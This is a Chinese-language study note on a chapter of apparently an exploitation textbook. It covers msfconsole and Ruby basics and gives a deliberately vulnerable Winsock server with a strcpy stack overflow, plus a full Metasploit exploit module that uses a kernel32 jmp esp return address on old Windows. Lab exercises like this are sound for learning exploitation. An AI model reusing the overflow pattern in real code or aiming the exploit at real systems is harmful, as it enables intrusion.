note chapter 4
发表于更新于
字数总计:527阅读时长:2分钟 中国
notes abouter chapter 4
本章基本就是教怎么使用msfconsole的。
from 4.3
shellcode测试:
from 4.4
Ruby 简要学习。
首先hello world,这里有坑,t.rb要在msf_root/bin目录下创建,要到msf_root/bin的目录下打开msfconsole,然后输入的指令是:
如图:
from 4.6
触发漏洞的server代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57
| #include<iostream.h> #include<winsock2.h> #pragma comment(lib, "ws2_32.lib") void msg_display(char * buf) { char msg[200]; strcpy(msg,buf); cout<<"********************"<<endl; cout<<"received:"<<endl; cout<<msg<<endl; } void main() { int sock,msgsock,lenth,receive_len; struct sockaddr_in sock_server,sock_client; char buf[0x200]; WSADATA wsa; WSAStartup(MAKEWORD(1,1),&wsa); if((sock=socket(AF_INET,SOCK_STREAM,0))<0) { cout<<sock<<"socket creating error!"<<endl; exit(1); } sock_server.sin_family=AF_INET; sock_server.sin_port=htons(7777); sock_server.sin_addr.s_addr=htonl(INADDR_ANY); if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server))) { cout<<"binging stream socket error!"<<endl; } cout<<"**************************************"<<endl; cout<<" exploit target server 1.0 "<<endl; cout<<"**************************************"<<endl; listen(sock,4); lenth=sizeof(struct sockaddr); do{ msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth); if(msgsock==-1) { cout<<"accept error!"<<endl; break; } else do { memset(buf,0,sizeof(buf)); if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0) { cout<<"reading stream message erro!"<<endl; receive_len=0; } msg_display(buf); }while(receive_len); closesocket(msgsock); }while(1); WSACleanup(); }
|
这里就是buff设置了0x200,而display的是200,可能在display buff的时候出发栈溢出。
这里的exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
| #! /usr/bin/env ruby require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'failwest_test', 'Platform' => 'win', 'Targets' => [ ['Windows 2000', {'Ret' => 0x7c86467b } ], ['Windows XP SP2',{'Ret' => 0x7c86467b } ] ], 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", } ) ) end def exploit connect attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded sock.put(attack_buf) handler disconnect end end
|
我使用了kernell32.dll里的jmp esp:0x7c86467b
使用验证,这里payloads无法使用,有空用linux下的msf再试一下:
至此chapter 4学习完毕。